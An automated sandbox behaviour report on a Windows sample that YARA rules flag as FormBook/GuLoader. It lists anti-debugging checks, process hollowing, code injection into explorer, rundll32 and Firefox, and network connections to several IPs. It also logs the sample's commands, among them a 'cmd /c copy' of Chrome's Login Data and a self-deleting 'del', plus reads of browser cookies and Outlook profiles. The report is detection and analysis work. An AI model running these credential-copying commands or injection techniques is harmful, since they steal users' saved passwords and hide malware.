Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8BCB1E mov eax, dword ptr fs:[00000030h]		10_2_1E8BCB1E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]		10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]		10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C8B10 mov eax, dword ptr fs:[00000030h]		10_2_1E8C8B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10 mov eax, dword ptr fs:[00000030h]		10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E901B0F mov eax, dword ptr fs:[00000030h]		10_2_1E901B0F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E901B0F mov eax, dword ptr fs:[00000030h]		10_2_1E901B0F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8FCB20 mov eax, dword ptr fs:[00000030h]		10_2_1E8FCB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]		10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]		10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94CB20 mov eax, dword ptr fs:[00000030h]		10_2_1E94CB20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94DB2A mov eax, dword ptr fs:[00000030h]		10_2_1E94DB2A
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E94FB45 mov eax, dword ptr fs:[00000030h]		10_2_1E94FB45

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process queried: DebugPort

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Code function: 10_2_1E902EB0 NtProtectVirtualMemory,LdrInitializeThunk,

10_2_1E902EB0

Contains functionality to register its own exception handler

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Code function: 2_2_02322AD2 RtlAddVectoredExceptionHandler,

2_2_02322AD2

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: c8ahotgz8h.exe.14.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 88.99.22.5 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.120.157.187 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 116.62.216.226 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.164.153 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.76.223 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.29.140.185 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 81.2.194.128 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 203.170.80.250 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.155.212.139 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 136.143.191.204 80			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D50000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF788EE0000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF788EE0000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Thread register set: target process: 4644			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 4644			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"			Jump to behavior
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000E.00000000.47858819329.0000000004840000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000E.00000000.47850576107.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47756506661.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.47800056030.0000000000BA9000.00000004.00000020.sdmp, explorer.exe, 0000000E.00000000.48034350183.0000000000BA9000.00000004.00000020.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000000E.00000000.47758312609.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47852842448.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.48036459938.0000000001280000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000000.47801972989.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 0000000F.00000002.51924728169.0000000002D71000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000E.00000000.47768699367.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47813132765.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48048687198.0000000009713000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47865140469.0000000009713000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndH

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Generic Dropper

Source: Yara match	File source: Process Memory Space: Zr26f1rL6r.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c8ahotgz8h.exe PID: 5908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c8ahotgz8h.exe PID: 2508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: c8ahotgz8h.exe PID: 7388, type: MEMORYSTR

Yara detected FormBook

Source: Yara match	File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

GuLoader behavior detected

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY